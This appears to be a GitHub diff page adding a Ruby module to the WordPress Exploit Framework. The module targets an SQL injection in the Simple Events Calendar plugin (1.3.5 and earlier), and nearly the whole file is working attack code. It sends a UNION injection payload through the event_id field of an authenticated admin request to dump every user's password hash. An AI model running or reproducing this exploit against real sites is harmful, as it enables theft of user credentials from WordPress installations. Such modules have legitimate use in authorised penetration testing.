This repository was archived by the owner on Oct 22, 2020. It is now read-only.
File tree Expand file tree Collapse file tree 1 file changed +69
-0
lines changed
Expand file tree Collapse file tree 1 file changed +69
-0
lines changed Original file line number Diff line number Diff line change 1+ # frozen_string_literal: true
2+
3+ class Wpxf ::Auxiliary ::SimpleEventsCalendarHashDump < Wpxf ::Module
4+ include Wpxf ::WordPress ::HashDump
5+
6+ def initialize
7+ super
8+
9+ update_info (
10+ name : 'Simple Events Calendar <= 1.3.5 Authenticated Hash Dump' ,
11+ desc : %(
12+ Simple Events Calendar <= 1.3.5 contains an SQL injection vulnerability
13+ which can be leveraged by all registered users with the permission
14+ to manage events. This module utilises this vulnerability
15+ to dump the hashed passwords of all users in the database.
16+ ) ,
17+ author : [
18+ 'Lenon Leite' , # Disclosure
19+ 'Rob Carr <rob[at]rastating.com>' # WPXF module
20+ ] ,
21+ references : [
22+ [ 'WPVDB' , '8955' ] ,
23+ [ 'URL' , 'http://lenonleite.com.br/en/blog/2017/11/03/simple-events-calendar-1-3-5-wordpress-plugin-sql-injection/' ]
24+ ] ,
25+ date : 'Nov 03 2017'
26+ )
27+ end
28+
29+ def check
30+ check_plugin_version_from_readme ( 'simple-events-calendar' , '1.3.6' )
31+ end
32+
33+ def requires_authentication
34+ true
35+ end
36+
37+ def reveals_one_row_per_request
38+ true
39+ end
40+
41+ def hashdump_request_method
42+ :post
43+ end
44+
45+ def hashdump_request_params
46+ {
47+ 'page' => 'simple-events'
48+ }
49+ end
50+
51+ def hashdump_request_body
52+ {
53+ 'edit' => '1' ,
54+ 'event_id' => "-#{ Utility ::Text . rand_numeric ( 2 ) } union #{ hashdump_sql_statement } #"
55+ }
56+ end
57+
58+ def hashdump_visible_field_index
59+ 3
60+ end
61+
62+ def hashdump_number_of_cols
63+ 9
64+ end
65+
66+ def vulnerable_url
67+ normalize_uri ( wordpress_url_admin , 'admin.php' )
68+ end
69+ end
You can’t perform that action at this time.
0 commit comments